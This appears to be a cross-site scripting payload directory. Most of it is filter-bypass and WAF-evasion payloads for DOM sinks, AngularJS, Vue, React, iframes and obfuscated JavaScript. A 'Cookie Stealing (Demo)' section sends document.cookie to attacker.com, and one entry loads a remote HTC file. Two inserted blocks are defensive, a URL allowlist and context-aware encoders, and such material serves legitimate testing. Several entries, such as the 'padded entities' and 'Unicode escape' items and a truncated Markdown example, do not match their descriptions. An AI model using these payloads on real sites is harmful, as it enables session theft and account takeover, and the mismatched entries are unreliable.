Base64 encoded payload in hash executed by Function constructor
Function(atob(location.hash.substring(1)))() // URL: page.html#YWxlcnQoMSk=
dom
advanced
bypass filter
DOM-Based XSS
URL encoded payload in hash for setTimeout
setTimeout(decodeURIComponent(location.hash.substring(1))) // URL: page.html#alert%281%29
dom
advanced
bypass filter
DOM-Based XSS
unescape with query string for document.write
document.write(unescape(location.search.substring(1))) // URL: page.html?<img%20src=x%20onerror=alert(1)>
dom
advanced
bypass filter
DOM-Based XSS
Programmatic click on a javascript: link
<a id=LNK href="javascript:alert(1)"></a><script>LNK.click()</script>
dom
advanced
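Several entries in this section end in a navigation sink (document.location, href, iframe src), and the javascript: evasions under WAF Evasions exist to get past a check on the raw value. The block below is an added example, not the directory's own code: a scheme allowlist that first applies the normalisation the browser itself applies (entity decoding in attribute values, removal of ASCII tab/CR/LF, trimming of leading and trailing controls), then reads the scheme. The function names and the sample inputs are this example's own assumptions.

```javascript
// Added example, not the directory's own code: a scheme allowlist for values
// that reach a navigation sink (location =, <a href>, iframe src). It applies
// the same normalisation the browser applies before parsing a URL, so the
// javascript: evasions in the WAF Evasions section (mixed case, embedded
// tab/newline, HTML entities, leading whitespace) are caught.

const NAMED_ENTITIES = new Map([
  ['amp', '&'], ['lt', '<'], ['gt', '>'], ['quot', '"'], ['apos', "'"],
  ['colon', ':'], ['Tab', '\t'], ['NewLine', '\n'],
]);

// Decode numeric (&#106; / &#x6A;) and the few named entities that matter for
// a URL. This mirrors what the HTML parser does to an attribute value before
// the URL parser ever sees it, which is why a check on the raw source text is
// fooled by &#58; standing in for the colon.
function decodeHtmlEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|([a-z]+));?/gi, (match, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
    }
    return NAMED_ENTITIES.has(name) ? NAMED_ENTITIES.get(name) : match;
  });
}

// WHATWG URL parsing removes every ASCII tab, LF and CR, and strips leading
// and trailing C0 controls and spaces, before the scheme is read.
function normalizeUrl(raw) {
  return decodeHtmlEntities(String(raw))
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
}

const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

// True when the normalised URL has no scheme (it resolves against the page's
// own origin; scheme-relative //host URLs are an open-redirect concern, not a
// script one) or an allowlisted scheme. javascript:, data: and vbscript: all
// fail, however they were disguised.
function isSafeUrl(raw) {
  const url = normalizeUrl(raw);
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (scheme === null) return true;
  return SAFE_SCHEMES.has(scheme[1].toLowerCase());
}

// Drop-in guard for a sink such as document.location = value.
function safeHref(raw) {
  return isSafeUrl(raw) ? normalizeUrl(raw) : 'about:blank';
}

// Constructed inputs, taken from the entries in this directory.
const EVASIONS = [
  'javascript:alert(1)',
  'JaVaScRiPt:alert(1)',
  'jav\tascript:alert(1)',
  'java\nscript:alert(1)',
  ' javascript:alert(1)',
  'jAvAsCrIpT&#58;alert(1)',
  '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)',
  'data:text/html,<script>alert(1)</script>',
];
```

Percent-encoding is deliberately not decoded: `javascript%3Aalert(1)` never becomes a javascript: URL in the browser either, because the URL parser requires a literal colon after the scheme, so decoding it here would only add false positives.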
Framework-Specific
Vue.js v-html with tainted data
<div v-html="userInput"></div> <!-- userInput = <img src=x onerror=alert(1)> -->
framework
advanced
Framework-Specific
Vue.js attribute binding to javascript URI
<a :href="'javascript:alert(1)'">Click</a>
framework
advanced
bypass filter
Framework-Specific
Vue.js event handler assignment prototype pollution (conceptual)
{{ $on.click = constructor.constructor('alert(1)') }}
framework
advanced
Framework-Specific
React dangerouslySetInnerHTML from props
<div dangerouslySetInnerHTML={{__html: props.data}}></div> <!-- props.data = <img src=x onerror=alert(1)> -->
framework
advanced
Framework-Specific
React href prop with javascript URI (React logs a console warning but still renders the link)
<a href={javascriptURI}>Click</a> <!-- javascriptURI = 'javascript:alert(1)' -->
framework
advanced
bypass filter
Framework-Specific
AngularJS client-side template injection: user input rendered server-side into an ng-app scope
<div ng-app>{{userInput}}</div> <!-- userInput = constructor.constructor('alert(1)')() -->
framework
advanced
Framework-Specific
AngularJS ng-bind-html, needs $sanitize bypass
<div ng-bind-html="userInput"></div> <!-- userInput = <img src=x onerror=alert(1)> (requires $sanitize bypass or $sce.trustAsHtml) -->
framework
advanced
Framework-Specific
AngularJS ng-bind-html with controller value and SCE bypass
ctrl.value = '<img src=x onerror=alert(1)>'; // then {{ctrl.value}} is used in ng-bind-html with SCE bypass
framework
advanced
Framework-Specific
AngularJS 1.4.x sandbox escape (overwrites String.prototype.charAt so the expression lexer accepts the injected code)
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
framework
advanced
Framework-Specific
Svelte {@html ...} tag injection
SvelteComponent.$set({ html: '<img src=x onerror=alert(1)>' }) // if component uses {@html ...}
framework
advanced
Framework-Specific
Handlebars unescaped triple-stash rendering untrusted HTML (Handlebars expressions cannot call constructor chains, so the vector is a template author's {{{ }}} rather than a sandbox escape)
{{{userInput}}} <!-- userInput = <img src=x onerror=alert(1)> -->
framework
advanced
Framework-Specific
AngularJS $injector service used to reach $window.alert from a module run block (needs a script-injection point, so it mostly shows how the injector exposes window)
<script>angular.module('xss', []).run(['$injector', function($injector) { $injector.get('$window').alert(1); }]);</script><div ng-app=xss>
framework
advanced
Framework-Specific
React dynamic element creation from JSON
{"element":"a","props":{"href":"javascript:alert(1)"},"children":"Click Me"} // if JSON used to render React elements
framework
advanced
Framework-Specific
Knockout.js html binding
<div data-bind="html: evilHtml"></div> <!-- evilHtml = <img src=x onerror=alert(1)> -->
framework
advanced
Framework-Specific
Apache Tapestry event handler injection (conceptual)
<t:input t:type="text" t:value="prop:inputValue" onclick="alert(1)"/>
framework
advanced
Polyglot Payloads
HTML attribute, JS string, and comment
"/onload=alert(1)//
polyglot
bypass filter
intermediate
Polyglot Payloads
Close previous script and start new one
></script><script>alert(1)</script>
polyglot
bypass filter
intermediate
Polyglot Payloads
Hex HTML entities for the script tag's angle brackets (only decoded where entities are interpreted, such as an attribute-value context like srcdoc)
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
polyglot
bypass filter
advanced
Polyglot Payloads
JS template literal, HTML attribute, comment
`-alert(1)//
polyglot
bypass filter
intermediate
Polyglot Payloads
JS string in URI, HTML attribute, comment (the expression evaluates to a string, which the browser renders as the new document; put markup inside the string, as in the iframe entry, if execution is needed)
javascript:'alert(1)'"//
polyglot
bypass filter
intermediate
Polyglot Payloads
Multi-line JS comment and execution
*/alert(1);/*
polyglot
intermediate
Polyglot Payloads
HTML comment breakout
--!><script>alert(1)</script><!--
polyglot
bypass filter
intermediate
Polyglot Payloads
Attribute injection, works if src is missing/invalid
onerror=alert(1) src=a:
polyglot
event handlers
intermediate
Polyglot Payloads
JS string breakout
'); alert(1); //
polyglot
intermediate
Polyglot Payloads
JS comment in javascript URI
javascript:/**/alert(1)
polyglot
bypass filter
intermediate
Polyglot Payloads
Recursive script tag attempt
<scri<script>pt>alert(1)</scri</script>pt>
polyglot
waf evasion
intermediate
Polyglot Payloads
src attribute injection with a single-quoted javascript: URI (executes for iframe and frame, not for img)
src='javascript:alert(1)'
polyglot
bypass filter
intermediate
Polyglot Payloads
No space between attribute and onerror
<img src='x'onerror='alert(1)'>
polyglot
event handlers
bypass filter
intermediate
Polyglot Payloads
Backtick, double, single quote attribute breakout
`"'><img src=x onerror=alert(1)>
polyglot
bypass filter
advanced
Polyglot Payloads
JS object literal property lookup as the call target
<script>({0:alert})[0](1)</script>
polyglot
advanced
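The breakout strings in this section each target one output context: a quoted attribute, a JS string literal, a script block. The block below is an added example, not from the FindXSS directory, that renders one untrusted value into four contexts with the encoder each context needs and uses the polyglots above as test input. It also shows the mistake the `></script><script>` entry exploits: JSON.stringify escapes quotes and backslashes but leaves `</script>` alone, and the HTML tokenizer, which runs before any JavaScript, ends the block there. The function names and the sample page are this example's own assumptions.

```javascript
// Added example, not from the FindXSS directory: one untrusted value rendered
// into four contexts, each with the encoder that context needs. The polyglot
// and breakout entries above are the constructed test input.

const HTML_ENTITY = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };

// Element content and quoted attribute values.
function encodeForHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, c => HTML_ENTITY[c]);
}

// Inside a JS string literal in an inline <script>: escape every
// non-alphanumeric ASCII character as \xHH so neither quotes nor '</script>'
// nor a JS comment opener survives, and escape the two non-ASCII line
// terminators a JS parser treats as a newline.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, c => {
    const cp = c.charCodeAt(0);
    if (cp < 0x100) return '\\x' + cp.toString(16).padStart(2, '0');
    if (cp === 0x2028 || cp === 0x2029) return '\\u' + cp.toString(16);
    return c;
  });
}

// What many codebases do instead: correct for JSON, wrong inside <script>,
// because the HTML tokenizer never sees JavaScript escapes.
function naiveJsString(value) {
  return JSON.stringify(String(value)).slice(1, -1);
}

// Query-string component. Whether the href as a whole has a safe scheme is a
// separate check, not something percent-encoding provides.
function encodeForUrlParam(value) {
  return encodeURIComponent(String(value));
}

// Hypothetical page fragment using the same value in four contexts.
function renderProfile(name) {
  return [
    `<h1>${encodeForHtml(name)}</h1>`,
    `<input value="${encodeForHtml(name)}">`,
    `<script>var user = '${encodeForJsString(name)}';</script>`,
    `<a href="/u?name=${encodeForUrlParam(name)}">profile</a>`,
  ].join('\n');
}

// Number of script-block terminators in the output: exactly one means the
// value could not end the block early.
function countScriptClosers(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// Constructed breakout strings copied from the Polyglot Payloads entries.
const BREAKOUTS = [
  '"><img src=x onerror=alert(1)>',
  "'-alert(1)//",
  '></script><script>alert(1)</script>',
  '`"\'><img src=x onerror=alert(1)>',
];
```

Note that encodeForHtml encodes the slash too: that is what keeps `</script>` from ever appearing literally in element content, even though the h1 context would tolerate it. The `\xHH` choice for the script context is the one an HTML-aware JS encoder has to make; escaping only quotes is the bug the third breakout string finds.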
iFrame Based
VBScript URI in iframe (IE only)
<iframe src="VbScRiPt:alert(1)"></iframe>
bypass filter
advanced
iFrame Based
SVG in iframe srcdoc
<iframe srcdoc="<svg onload=alert(1)>"></iframe>
bypass filter
advanced
event handlers
intermediate
iFrame Based
Base64 encoded SVG in iframe data URI (opaque origin: no access to the embedding page)
<iframe src="data:text/html;charset=utf-8;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+PC9zdmc+"></iframe>
bypass filter
advanced
event handlers
intermediate
iFrame Based
iframe src with commented out end
<iframe src="javascript:'<script>alert(1)</script>'//">
bypass filter
intermediate
iFrame Based
iframe with sandbox allow-scripts (the script runs, but in an opaque origin without allow-same-origin, and the embedding page's CSP still applies to srcdoc content)
<iframe sandbox="allow-scripts" srcdoc="<script>alert(1)</script>"></iframe>
advanced
intermediate
iFrame Based
iframe with data URI and body onload
<iframe src='data:text/html,<body onload=alert(1)>'></iframe>
bypass filter
advanced
event handlers
intermediate
iFrame Based
iframe with base64 encoded eval
<iframe src=javascript:eval(atob('YWxlcnQoMSk='))></iframe>
bypass filter
advanced
iFrame Based
iframe onload DOM manipulation (same domain)
<iframe src="//example.com" onload="this.contentWindow.document.body.innerHTML+='<img src=x onerror=alert(document.domain)>'"></iframe>
event handlers
advanced
dom
intermediate
iFrame Based
srcdoc trying to access parent (needs no sandbox or specific sandbox)
<iframe srcdoc='<!DOCTYPE html><script>parent.alert(1)</script>'></iframe>
advanced
iFrame Based
iframe onload to navigate to javascript URI
<iframe src="about:blank" onload="this.contentWindow.location='javascript:alert(1)'"></iframe>
event handlers
advanced
intermediate
Obfuscated/Encoded
String concatenation for window property access
<script>window['a'+'l'+'e'+'r'+'t'](1)</script>
advanced
bypass filter
Obfuscated/Encoded
Function constructor with string concatenation
<script>constructor.constructor('ale'+'rt(1)')()</script>
advanced
bypass filter
Obfuscated/Encoded
setTimeout with string concatenation in event handler
<img src=x onerror="setTimeout('ale'+'rt(1)',0)">
advanced
bypass filter
event handlers
Obfuscated/Encoded
Array constructor to get Function constructor in SVG
<svg onload="[].constructor.constructor('ale'+'rt(1)')()">
advanced
bypass filter
event handlers
Obfuscated/Encoded
String.fromCharCode decimal
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
advanced
bypass filter
Obfuscated/Encoded
Unicode escape sequence for alert(1)
<script>eval('\u0061\u006C\u0065\u0072\u0074(1)')</script>
advanced
bypass filter
Obfuscated/Encoded
unescape via variable
<script>var x = unescape; x('%61%6c%65%72%74%28%31%29');</script>
advanced
bypass filter
Obfuscated/Encoded
String concatenation for 'this' property access
<script>this['ale'+'rt'](1)</script>
advanced
bypass filter
Obfuscated/Encoded
IIFE with const variable (conceptual obfuscation)
<script>(() => { const evil = 'alert'; window[evil](1); })()</script>
advanced
Obfuscated/Encoded
Obfuscated top['alert'](1) - Number.toString(radix)
<script>top[8680439..toString(30)](1)</script>
advanced
bypass filter
Obfuscated/Encoded
Template literal with string concat property access
<img src=x onerror=window['ale'+'rt']`1`>
advanced
bypass filter
event handlers
Obfuscated/Encoded
RegExp constructor for Function constructor
<script>RegExp.constructor('alert(1)')()</script>
advanced
bypass filter
Obfuscated/Encoded
String concatenation for location assignment
<script>location='javascript:'+'alert(1)';</script>
advanced
bypass filter
Obfuscated/Encoded
HTML comment obfuscation
<!--<img src=--><img src=x onerror=alert(1)//-->
advanced
bypass filter
Obfuscated/Encoded
Attribute breaking out (less common)
<Script x=">">alert(1)</script>
advanced
bypass filter
Obfuscated/Encoded
JSFuck 'alert' (conceptual, requires full JSFuck library for complex functions)
<script>(''+(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]])(1)</script>
advanced
bypass filter
Obfuscated/Encoded
Base64 encoded script in data URI src
<script src="data:text/javascript;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
advanced
bypass filter
Obfuscated/Encoded
Missing equals for src, relies on loose parsing
<img src/onerror=alert(1)>
advanced
bypass filter
event handlers
Obfuscated/Encoded
JS comment and template literal used for obfuscation
<script>/*`*/confirm(1)//</script>
advanced
bypass filter
Obfuscated/Encoded
Padded decimal HTML entities
<a href="javascript:alert(1)">X</a>
advanced
bypass filter
Cookie Stealing (Demo)
Cookie stealing via SVG onload and fetch (DEMO ONLY)
<svg onload="fetch('//attacker.com/?c='+document.cookie)"></svg>
event handlers
advanced
intermediate
Cookie Stealing (Demo)
Cookie stealing via navigator.sendBeacon (DEMO ONLY)
<script>navigator.sendBeacon('//attacker.com/beacon', document.cookie)</script>
advanced
intermediate
Cookie Stealing (Demo)
Cookie stealing via auto-submitting form (DEMO ONLY)
<form action="//attacker.com/"><input type=hidden name=c value=""><input type=submit></form><script>document.forms[0].c.value=document.cookie;document.forms[0].submit();</script>
advanced
intermediate
Cookie Stealing (Demo)
Cookie stealing via window.open on click (DEMO ONLY)
<a href=# onclick="window.open('//attacker.com/?'+document.cookie)">Click to steal (DON'T)</a>
event handlers
intermediate
Cookie Stealing (Demo)
Cookie stealing via document.write in body onload (DEMO ONLY, may mess up page)
<body onload="let c=document.cookie; document.write('<img src=//attacker.com/?'+c+'>');">
event handlers
advanced
intermediate
Real-World Attacks
Conceptual: Input data rendered unfiltered by typeahead suggestions.
<!-- Example: Twitter typeahead.js vulnerability. Input: <img src=x onerror=alert(1)> -->
advanced
framework
Real-World Attacks
Conceptual: JSONP endpoint with AngularJS where callback name is injectable.
<!-- Example: AngularJS template injection in JSONP callback. callback=angular.callbacks._0;alert(1)// -->
advanced
framework
Real-World Attacks
Conceptual: Open redirect vulnerable parameter used with javascript: URI.
<!-- Example: eBay redirection XSS. Redirect URL: javascript:alert(document.domain) -->
advanced
Real-World Attacks
Conceptual: Markdown image syntax abused if parser doesn't sanitize javascript: URIs.
<!-- Example: Stored XSS via Markdown parser bypass. ) -->
advanced
bypass filter
Real-World Attacks
Conceptual: HTC file used for persistent XSS in IE, if attacker can upload .htc
<div style="behavior:url('http://attacker.com/xss.htc')"></div>
advanced
Basic Alerts
Data URI with comma instead of base64
<a href="data:text/html;,<script>alert(1)</script>">Click</a>
advanced
bypass filter
intermediate
Event Handlers
onblur after onfocus clears value
<input type=text value=XSS onfocus=this.value='' onblur=alert(1)>
event handlers
intermediate
WAF Evasions
Unicode escape in data URI src
<sCriPt sRc="data:text/javascript,alert(1)"></sCriPt>
waf evasion
bypass filter
advanced
DOM-Based XSS
DOM creation of iframe with JS URI
var ifr=document.createElement('iframe');ifr.src='javascript:alert(1)';document.body.appendChild(ifr);
dom
advanced
intermediate
HTML Context (No Script Tag)
Script in foreignObject in SVG
<svg><foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><script>alert(1)</script></body></foreignObject></svg>
advanced
Polyglot Payloads
Attribute breakout to iframe
"><iframe src=javascript:alert(1)>
polyglot
bypass filter
intermediate
Obfuscated/Encoded
Unicode escape for 'c' in script tags
<script>alert(1)</script>
waf evasion
bypass filter
advanced
Event Handlers
ondragstart event
<a draggable="true" ondragstart="alert(1)">Drag me</a>
event handlers
intermediate
Basic Alerts
Object tag onbeforeload (conceptual, requires specific content)
<object onbeforeload=alert(1)></object>
event handlers
advanced
WAF Evasions
Self property access with concatenation
<img src=x onerror="self['al'+'ert'](1)">
waf evasion
bypass filter
event handlers
advanced